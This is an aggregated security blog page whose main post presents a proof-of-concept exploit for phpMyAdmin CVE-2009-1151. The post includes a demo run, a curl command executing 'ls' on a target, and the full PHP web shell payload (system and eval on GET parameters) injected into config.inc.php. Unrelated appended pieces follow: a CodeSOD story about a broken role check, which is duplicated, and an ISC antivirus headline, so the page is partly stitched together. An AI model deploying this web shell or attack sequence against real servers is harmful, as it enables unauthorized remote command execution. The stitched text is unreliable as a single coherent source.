CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept

I couldn’t find any public PoC/exploit for this phpMyAdmin vulnerability, despite it being a serious bug affecting a popular open-source project.

I think this vulnerability is a nice reminder that it’s still possible to perform remote command execution these days without relying on SQL injection (i.e.: xp_cmdshell) or a memory corruption bug (i.e.: heap overflow).

All the documentation you need is in the script comments. I recommend you to go through it, before you actually run the script.

After reading the public advisory and patched code, and playing around for a while, I managed to have a working PoC bash script. The script will allow you to remotely run shell commands and PHP code against vulnerable targets. Although in principle the vulnerability sounds quite simple, it actually took me a while to go from advisory to working attack code.

I’m providing the script with the hope that it will help pentesters and security researchers. Please only test the script against your own systems, or systems you have been given permission to pentest! Don’t be evil, it’s not worth it.

Demo $ ./phpMyAdminRCE.sh usage: ./phpMyAdminRCE.sh i.e.: ./phpMyAdminRCE.sh http://target.tld/phpMyAdmin/ $ ./phpMyAdminRCE.sh http://172.16.211.10/phpMyAdmin-3.0.1.1/ [+] checking if phpMyAdmin exists on URL provided ... [+] phpMyAdmin cookie and form token received successfully. Good! [+] attempting to inject phpinfo() ... [+] success! phpinfo() injected successfully! output saved on /tmp/phpMyAdminRCE.sh.9217.phpinfo.flag.html [+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.: http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/ http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?p=phpinfo(); please send any feedback/improvements for this script to unknown.pentestergmail.com $ curl "http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/" total 96 drwxr-xr-x 2 root root 4096 Mar 11 10:12 bin drwxr-xr-x 3 root root 4096 May 6 10:01 boot lrwxrwxrwx 1 root root 11 Oct 12 2008 cdrom -> media/cdrom drwxr-xr-x 15 root root 14300 Jun 5 09:02 dev drwxr-xr-x 147 root root 12288 Jun 5 09:02 etc drwxr-xr-x 3 root root 4096 Oct 18 2008 home drwxr-xr-x 2 root root 4096 Jul 2 2008 initrd [partial output removed for brevity reasons]

Contents of /config/config.inc.php after our evil code has been successfully injected (injected code shown in bold):

<?php /* * Generated configuration file * Generated by: phpMyAdmin 3.0.1.1 setup script by Michal Čihař <michal@cihar.com> * Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $ * Date: Tue, 09 Jun 2009 14:13:34 GMT */ /* Servers configuration */ $i = 0; /* Server (config:root) [1] */ $i++; $cfg['Servers'][$i]['host']=''; if($_GET['c']){echo '<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo '<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost'; $cfg['Servers'][$i]['extension'] = 'mysqli'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['compress'] = false; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root'; /* End of servers configuration */ ?> Thanks

I’d like to thank Greg Ose for discovering such a cool vuln and doing a nice writeup about the technical details! Also big thanks to str0ke for testing this PoC script and providing such useful feedback!

---
gnucitizen information security gigs part of the cutting-edge network:

GNUCITIZEN Content Survey

---
recent posts from the gnucitizen cutting-edge network:

Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious
Microsoft Motion Control - The Future is Now
Micro Communities

Blogs ::  Feedproxy Security



Povezani zapisi:

08-22-2010 1:31

Bulletproof Public PC 7.3

CodeSOD: Role-based Canary

Role-based security requires, at a minimum, two key elements: users and roles. Roles (such as Administrator, Clerk, and ViewOnlyUser) are defined by the application code and then assigned to users to restrict which functions of the application they may use. It's a pretty simple concept that involves all of two database tables, or one if the user names come from some external source like Active Directory.

In Adam's case, the Role-based security feature served as a coalmine canary in the application he was tasked with reviewing. Although it passed all of the test cases — employees could only do certain things, customers could do other things, etc. — there was one fundamental flaw with the system. See if you can spot it.

The roleName parameter is a string ("Employee") that's is passed in from a method to check security, and UserName is just that: it's the user's name. So, users with a name that started with "Emp" would be granted access to Employee functions, while no one else would. And why "Emp"? As it turned out, the user names created for testing were "Employee1", "Employee2", "Employee3", and so on.

As for the rest of the system, it's development was similar: it passed the test cases and little more.

CodeSOD: Role-based Canary

Role-based security requires, at a minimum, two key elements: users and roles. Roles (such as Administrator, Clerk, and ViewOnlyUser) are defined by the application code and then assigned to users to restrict which functions of the application they may use. It's a pretty simple concept that involves all of two database tables, or one if the user names come from some external source like Active Directory.

In Adam's case, the Role-based security feature served as a coalmine canary in the application he was tasked with reviewing. Although it passed all of the test cases — employees could only do certain things, customers could do other things, etc. — there was one fundamental flaw with the system. See if you can spot it.

The roleName parameter is a string ("Employee") that's is passed in from a method to check security, and UserName is just that: it's the user's name. So, users with a name that started with "Emp" would be granted access to Employee functions, while no one else would. And why "Emp"? As it turned out, the user names created for testing were "Employee1", "Employee2", "Employee3", and so on.

As for the rest of the system, it's development was similar: it passed the test cases and little more.

We have reports of AVG reporting a trojan downloader on our main page and RSS feed: It is due to the code snippet we are showing in one of our diaries., (Mon, Aug 16th)